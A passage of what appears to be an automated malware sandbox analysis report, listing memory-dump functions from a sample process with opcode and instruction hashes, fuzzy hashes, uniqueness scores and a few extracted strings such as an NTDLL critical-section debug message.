                    • Instruction ID: 0361adedab41bbdd08cd60a1432c135816dce31f738386f09976f827e5586acb
                    • Opcode Fuzzy Hash: 258ed7718e1ee04e441496dee760f11e61d299de65a59db361082d5b472695f5
                    • Instruction Fuzzy Hash: 86113971D14348DADF25EFA889057DDBBB0BB14314F20829EE5A9AB2D2C3344A01CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0106FF60
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                    • API String ID: 0-1911121157
                    • Opcode ID: 5bd03d0ad47d7684f2c1f028501b686f6c2c54eab4149e2a48456aea4f188ad1
                    • Instruction ID: 5397737395fd019cc447fcce6096550424c1fa647ba4aa82bbc339bec17313a6
                    • Opcode Fuzzy Hash: 5bd03d0ad47d7684f2c1f028501b686f6c2c54eab4149e2a48456aea4f188ad1
                    • Instruction Fuzzy Hash: 50110071910145EFEB62EB54CD89FD8BBF1FF08704F248088F5886B2A1C7399A40DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: _F%5
                    • API String ID: 0-2021467486
                    • Opcode ID: ce1c5c7af8f5c857e5b7c8545b904c4349d995330e7b74d864ceabfce36e1b1a
                    • Instruction ID: cb41f2a5ff32e5c263c32b2f74fbb769bac1c4c75982456e57259edae75ad696
                    • Opcode Fuzzy Hash: ce1c5c7af8f5c857e5b7c8545b904c4349d995330e7b74d864ceabfce36e1b1a
                    • Instruction Fuzzy Hash: 7FB01237F460080B80145E0978000B0F374D3C7035F5073E3CE1CB76061092CC2941CC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 920588bd2592f668a0c091eb6aaed937715cac969d6b47214d8c4d41fb7153cf
                    • Instruction ID: 7ff43917bee58570fbafe242d4cd6c74e987858e45ca228dd8965e6e197791e9
                    • Opcode Fuzzy Hash: 920588bd2592f668a0c091eb6aaed937715cac969d6b47214d8c4d41fb7153cf
                    • Instruction Fuzzy Hash: 4E425B75900229CFDB64CFA8C880BA9BBF1FF45304F5881EAD98DAB242D7359985CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee8a032c2d7bc841d882c352c305676acef22f0dae5c5d4e18d79998b0ece43e
                    • Instruction ID: aafbde3b531272cc2e5224c9c4046594186cb0e03b6f852c60ae2474dc7d8394
                    • Opcode Fuzzy Hash: ee8a032c2d7bc841d882c352c305676acef22f0dae5c5d4e18d79998b0ece43e
                    • Instruction Fuzzy Hash: F5F18C719082158FC724DF19C480A7BB7E1FF98714F14496EFA86CB2A0E734E885EB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 352549c2dc4f3e4ac2059eb91e94c80dee94f3ec2b5c9ae618482a4594c0c7a8
                    • Instruction ID: 1bd94760b298c833ddd45a783d1d59848cfe02981fcfe8be30a7bacbcc000022
                    • Opcode Fuzzy Hash: 352549c2dc4f3e4ac2059eb91e94c80dee94f3ec2b5c9ae618482a4594c0c7a8
                    • Instruction Fuzzy Hash: 0DF1F0756083419FEB67CB2CC8847AA7BE1AF85724F0485ADE9D59B281D735D840CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e179dcfaa288b96af6570cede0650f1da2ffc1e5f4289cb35376660c9a367d94
                    • Instruction ID: 9b1e4e7c2e7c62e4a2f9f1de4c0817c08ff141e6e42b4f6e6622f9142d889917
                    • Opcode Fuzzy Hash: e179dcfaa288b96af6570cede0650f1da2ffc1e5f4289cb35376660c9a367d94
                    • Instruction Fuzzy Hash: E7E10631A00399CFEB34DF1AC840BA9B7B6BF85318F1441E9D9899B691DB34AD81DF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 410d380460bb9a44d62b672680b4f52f408f03f14b90f34ce14aa309345e8e40
                    • Instruction ID: dc232f639b6a64270a192f9d7d0b62564ac780876a657ea98097cc841b83be80
                    • Opcode Fuzzy Hash: 410d380460bb9a44d62b672680b4f52f408f03f14b90f34ce14aa309345e8e40
                    • Instruction Fuzzy Hash: E2B16F71E00349DFDB14EF99C980AADBBB9FF84344F204129E509AB255DB74AD42DF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 719309bff25fa196315e532934fb89bde21c24ca0a9a77e27af38dfc65c6a62b
                    • Instruction ID: e6951c10bf6222f886653c9cd1a22e48dfc07b05240438ea03977d8f851dc065
                    • Opcode Fuzzy Hash: 719309bff25fa196315e532934fb89bde21c24ca0a9a77e27af38dfc65c6a62b
                    • Instruction Fuzzy Hash: A8C112B55083818FD355CF28C480A5AFBE1BF89304F144AAEF9D98B392D775E945CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 886940667e827ce864134b76ba38c3be414e48262db6536fafe7241c4f25ae41
                    • Instruction ID: 50a23aa5f8bb583688a69e9cd5ab7799cb7dd5e9393a987b851f2c935b668ee5
                    • Opcode Fuzzy Hash: 886940667e827ce864134b76ba38c3be414e48262db6536fafe7241c4f25ae41
                    • Instruction Fuzzy Hash: 6D9118B1E006599FFB329B6CC884BAE7BE4AB01754F0502A1FAD0E72D5DB799D00C785
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b6a2d88507309ec2f61727134e4f6213f5e52e643fb6dab9feeb7d48c6bb5ea3
                    • Instruction ID: 005d34ed3830eba8a6487b55ab79611a1d065141d39aa26ca53eae1f98e382d9
                    • Opcode Fuzzy Hash: b6a2d88507309ec2f61727134e4f6213f5e52e643fb6dab9feeb7d48c6bb5ea3
                    • Instruction Fuzzy Hash: EC819EB56442429BDB66CE58C8C0B6AB7E5EF84354F1548BAEE859B241D330ED40CBE2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction ID: fd415b7e27717648420f66087d2cd7a3bc8cda82308061aa875ad5df14b92a03
                    • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction Fuzzy Hash: 0A818BB1A007459FDB25CF68C890BAABBF5FF48300F148569E996C7691D734EA41CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a319fb12f6091bc58f12467adc4547bbf5be50cb84dcc3316165f9a1670087d7
                    • Instruction ID: a97656c1a9a97e47fdda145c90bf925d2cc55bd4e98ce58ba7c3e6a61b0acfa3
                    • Opcode Fuzzy Hash: a319fb12f6091bc58f12467adc4547bbf5be50cb84dcc3316165f9a1670087d7
                    • Instruction Fuzzy Hash: C971EEB2340702AFE7329F18C845F6ABBE9EF40720F144568E695D76A1DBB5E940CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction ID: 351994a1d9159e6fe8f103b7f03b933d6ea0d04344f20a8589f844df616b16d4
                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction Fuzzy Hash: 15717B71E00219EFDB51DFA8C984AEEBBF9FF48700F504069EA44E7251DB34AA41DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 72640a942f15bb57e6a0b199bcd3d9b4c7adb6ebe05f9f7ec6e02482e49366ff
                    • Instruction ID: 55dc50dfda5445fb49e43d211a81cc2a4de722fac40c0b2a47be0add5e6c0557
                    • Opcode Fuzzy Hash: 72640a942f15bb57e6a0b199bcd3d9b4c7adb6ebe05f9f7ec6e02482e49366ff
                    • Instruction Fuzzy Hash: 2B51BB312057429BD321EF68C845B6BBBE9FF90B10F14091EF4D587651E775E804EB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02b6c2c5a959457c7ed6e64bf5d82c49385a966150788256db00320a0a033016
                    • Instruction ID: 8d735be478a7e2abb5bed973b125d0662b992c27e5256555472908f0a6c85f78
                    • Opcode Fuzzy Hash: 02b6c2c5a959457c7ed6e64bf5d82c49385a966150788256db00320a0a033016
                    • Instruction Fuzzy Hash: DC51C376E00525CFDB25DF1CC8889BDB7F1FB88700B19845AE8C69B395D735AA81CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b9d4910ea7c9b8708b1924c9981c6f0dc4e98263a2276a01c9baa403dafec7a1
                    • Instruction ID: 1b81fc345461706e90197cf05d3b5168329c8644dd51ccab7c20201a8c67bc53
                    • Opcode Fuzzy Hash: b9d4910ea7c9b8708b1924c9981c6f0dc4e98263a2276a01c9baa403dafec7a1
                    • Instruction Fuzzy Hash: AA41F4B1700215DBEF269A69C8B4B7BB7DAEF84720F048259F9D6876D0DB34D801E690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61268a24d89636874a38c29f7c5c1335fc5e74437fe58b47aae8fba524784e6a
                    • Instruction ID: 62487fbaa1551a0690f4b8725aafad0e3fef09ebbe07c4ece9c0d817c8d062d2
                    • Opcode Fuzzy Hash: 61268a24d89636874a38c29f7c5c1335fc5e74437fe58b47aae8fba524784e6a
                    • Instruction Fuzzy Hash: BF519E71E01219CFCB14CF68C480BAEBBF6BF48310F24815ADA95AB354DB75AD44DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction ID: f1b28a8debbeb138c24b300a4ea32a5f40c74328bb777f13cb63146b4c032260
                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction Fuzzy Hash: F5511231E042C9DFDB24CB6AD0907AEBBF1AF45324F2881B9D54593282C375AD89E741
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction ID: 1607d467a6f7e4533e0ffb33a2bd3c5587f25b88b5533f6128c1ea7aa3d35e34
                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction Fuzzy Hash: C8517E71500646DFDB16CF68C480A96FBF5FF45304F54C1AAE9489F212E7B2E946CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e6a09af2c55ed0ff096e5e0d958fc707ab36fbfe6c341164c3d49761e654e20
                    • Instruction ID: 9c2abc00db8137b682977b7654a013a387936fd68d0a5da72171d13cd467d511
                    • Opcode Fuzzy Hash: 6e6a09af2c55ed0ff096e5e0d958fc707ab36fbfe6c341164c3d49761e654e20
                    • Instruction Fuzzy Hash: 58519D7190021ADFEF26DF99C884ADEBBB5FF08310F158055E944AB2A0C7359D92CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b5cdcd3e71141b33ee3770123f41e590340610065ac217224d302408a3130aa2
                    • Instruction ID: 48db69e760a022ea9a0a5854ee8cb62632721cac9a16c07c4c3312354887f747
                    • Opcode Fuzzy Hash: b5cdcd3e71141b33ee3770123f41e590340610065ac217224d302408a3130aa2
                    • Instruction Fuzzy Hash: E9418175A002289BDB62DF68C981FEE77F4BF45710F0100A5EA48AB241E7799E84CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dcf615133a88f5fcb26f6ca4be587785a99bc14f8059c9cd9276dc854308da96
                    • Instruction ID: de02d536d7751786ac6ab51d87dea98f5a17b35f059e799e96e20380be5f23c1
                    • Opcode Fuzzy Hash: dcf615133a88f5fcb26f6ca4be587785a99bc14f8059c9cd9276dc854308da96
                    • Instruction Fuzzy Hash: 7941D271A443589FEB22DF18CC80BAAB7A9EB45710F0040AAEA85DB281D775ED44CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0bc5e67eb7decb0d4355b183befedf5ee766500af874c0fd49b245e481b28acc
                    • Instruction ID: 64773ca8d58ed63a62d950d95a9b5ceea725949879d57ab48e4b2cadf19bea12
                    • Opcode Fuzzy Hash: 0bc5e67eb7decb0d4355b183befedf5ee766500af874c0fd49b245e481b28acc
                    • Instruction Fuzzy Hash: D94181B1A0026C9BDB24EF16CC88AA9B3F4FB94750F1041EAD80DD7252DB749E81DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction ID: ecc93b8fea251d1b797ec037056d20df049fed37176c85f5968cc11a2e461c80
                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction Fuzzy Hash: 8A312632F00219ABEF159B69CC65BBFFBBADF84210F0584A9E984A7252DB748D00D650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                    • Instruction ID: 34837b26d4769fc18ee06b28d3bdc9fd60f5a5408afc3dc0552ebb4e00a6c134
                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                    • Instruction Fuzzy Hash: 57311632304642AFDB229768C874F6ABFEAEF85B50F184098E9C5CB352DA74DC41D750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                    • Instruction ID: 7669fae9bec8b49cd6843dee261615749bfc8313fc9a244be363a90b96a3f454
                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                    • Instruction Fuzzy Hash: 5C31B0726047059BCB29DF28CC90A6BB7EAFFC0710F04492DF59687691DA35E809DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4a707cfb4b87736e3bba1bdde335a76dc153381171e93b2a0dad80c72b6bcb18
                    • Instruction ID: b94a2ba4697195e134c5488a04aac0fa4eed4ee6b25f13389943c9ab3bd54896
                    • Opcode Fuzzy Hash: 4a707cfb4b87736e3bba1bdde335a76dc153381171e93b2a0dad80c72b6bcb18
                    • Instruction Fuzzy Hash: 6D417BB1D00208AFEB60CFAAC840BEEBBF4EF48714F14816AE994A7240DB759905CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2cd11e77ffb888845b14f472fa7a93a9a25c9a72e170cbb588bd0ef301498fd7
                    • Instruction ID: 0775556a92293a16d1b79cb24155298878ee2bec3064d4485c2fac2ec8e6183f
                    • Opcode Fuzzy Hash: 2cd11e77ffb888845b14f472fa7a93a9a25c9a72e170cbb588bd0ef301498fd7
                    • Instruction Fuzzy Hash: CA312A32642A01DBC722BF18CC45B6A77E9FF50B61F15461AF4950B2A5D730F804EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 55b1d26e90d3221194109031ccb59a3513a3cf346f0895deca91704d3e4eac5f
                    • Instruction ID: 12701eeec176da8bea5071599cdbea22fe38a34a757570623696895e9d0e53fe
                    • Opcode Fuzzy Hash: 55b1d26e90d3221194109031ccb59a3513a3cf346f0895deca91704d3e4eac5f
                    • Instruction Fuzzy Hash: 9131CD71A04614DBD725DF2ED881A7BBBE4FF85720B0580BAE986CF394E638D841C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f9ada7df2b0a56295eecbd2f5440166b8ee7eae764b86b6d7d02e39320d210d
                    • Instruction ID: dd2c69d54d31b73c3dbc2ece3a5d6359ac0472f7a167162db5d683ca24205070
                    • Opcode Fuzzy Hash: 3f9ada7df2b0a56295eecbd2f5440166b8ee7eae764b86b6d7d02e39320d210d
                    • Instruction Fuzzy Hash: 4F415AB5A00305DFDB15CF58C990B9EBBF1BB89304F15C1A9E945AB385C779A901CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5ad733f8072cabe0de45818b1874b4649f0bf33e9366a70f23a776b11853fd63
                    • Instruction ID: d5d0e43bc1eb384d25b530fe837d2a37915cf9ee2901ba410f2ebc598b41b244
                    • Opcode Fuzzy Hash: 5ad733f8072cabe0de45818b1874b4649f0bf33e9366a70f23a776b11853fd63
                    • Instruction Fuzzy Hash: 3B31E2726047919FC360DF2CCC40AABB7E9BF88700F444A69FD9587691E734E904DBA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                    • Instruction ID: e051fc44b37cfb404d1565168cdbabdbd9cc768daf10172e2221104b0b6569e7
                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                    • Instruction Fuzzy Hash: 5B314672B0158EAED705EBB4C980BF9F754BF42300F14816AE61847212CB386A19F7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fcf47a886951ed122621b4cc5636582a90e7679ad11bde55e3cbbf3546ab19b
                    • Instruction ID: 1f089c7fdb56023f968f0a5c94ce6cef34c1e0556dbe4b9e09a392a7664d74bb
                    • Opcode Fuzzy Hash: 4fcf47a886951ed122621b4cc5636582a90e7679ad11bde55e3cbbf3546ab19b
                    • Instruction Fuzzy Hash: D2316771609302DFC714EF18D88145ABBE1BFC5B00F0589AEF4C88B291D730E904CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bd905f3b6a4d5cd4ef7f4c6ffba5e4eb8a259eec97b83aab10c2f6a32a64b212
                    • Instruction ID: fe999ce4ebb79f0af3727043719b67246b8fc96e7fa166a2d82544623771f65a
                    • Opcode Fuzzy Hash: bd905f3b6a4d5cd4ef7f4c6ffba5e4eb8a259eec97b83aab10c2f6a32a64b212
                    • Instruction Fuzzy Hash: 4E31A0B1700205DFD722CB18DCA0F6EBBF9FB88710F544959E29687284D77AA901CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 51814e6f774023a44e8c33e085b4515e90d3c36151dcae1c20e832acf99d6810
                    • Instruction ID: 231c4bf4fdedb78f80980f5b634ae0ee2dd98c23b225278b762c301e36ed79af
                    • Opcode Fuzzy Hash: 51814e6f774023a44e8c33e085b4515e90d3c36151dcae1c20e832acf99d6810
                    • Instruction Fuzzy Hash: 8D315AB16057019FE361CF1DC840B6ABBE6EB88B00F0949BDE9D497291E7B1E804CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d96f8ad1d6ffc7c3618fd54ea83539554a84523c72e0a4dbcc962c72e410eea5
                    • Instruction ID: 62aed2d22fde4949124c76b955c2ceabb7736bed3b443eba7b63f2b131ed9c99
                    • Opcode Fuzzy Hash: d96f8ad1d6ffc7c3618fd54ea83539554a84523c72e0a4dbcc962c72e410eea5
                    • Instruction Fuzzy Hash: 4431D472A00619ABCB119F68CD41ABFB7B9EF44700F05406AF941DB250EB789D11EBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b6fb119cf961e2d236d7039045632de3c554f1d0236e6ac9a05ff6ab1d055e03
                    • Instruction ID: 3c1106ebf3d40f4525d4e2ed3b0830d4d883d0cd904955f238c8472afa3ec6d7
                    • Opcode Fuzzy Hash: b6fb119cf961e2d236d7039045632de3c554f1d0236e6ac9a05ff6ab1d055e03
                    • Instruction Fuzzy Hash: BF3132322013519FC7619F58C981B2ABBE4FFC4B10F82456EF9D28B265CB78D800CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6da8a6d084869d9a310428c09d184c1ea2703ca97099424de1cdd7c729b1b02
                    • Instruction ID: 17d09d70bc587b057fb24d65c1649fec3856d711922fe795be41138415a73e1f
                    • Opcode Fuzzy Hash: e6da8a6d084869d9a310428c09d184c1ea2703ca97099424de1cdd7c729b1b02
                    • Instruction Fuzzy Hash: EA41A1B5D002189FDB20CFAAD981AEEFBF4FB48710F5081AEE549A7240D7749A44CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c4ca2d7283644347ac2f648959d072bdcd814de3d50f2214805970125e194dd4
                    • Instruction ID: 399aa325f6d5c5e7079fc601586e44d53d47c6c4e9f958383390adfae77e5afc
                    • Opcode Fuzzy Hash: c4ca2d7283644347ac2f648959d072bdcd814de3d50f2214805970125e194dd4
                    • Instruction Fuzzy Hash: CB31C175A04249EFE745CF58C841F9ABBE4FB08314F148696FA48CB381D635ED80CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e0c1b3462d39c63991e64a3fa42224be4538585a44044054e1f155d7cc15778
                    • Instruction ID: fd036d0112177e2f859db6893e764ba3b109a699413c12565b775d692a7271ae
                    • Opcode Fuzzy Hash: 5e0c1b3462d39c63991e64a3fa42224be4538585a44044054e1f155d7cc15778
                    • Instruction Fuzzy Hash: F13105396006059FEB72EF98D4807AA73B4FF54311F140079ED84DB346E77AD9458B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62df32be7bba9658fb4ea6a59869f19cb55ef1be3e34302cf9511ae364374ffa
                    • Instruction ID: 05f4bbfc56dc8879d613ab5ba4a8530f06430f6cfea0b9cc53361c2e0574aa97
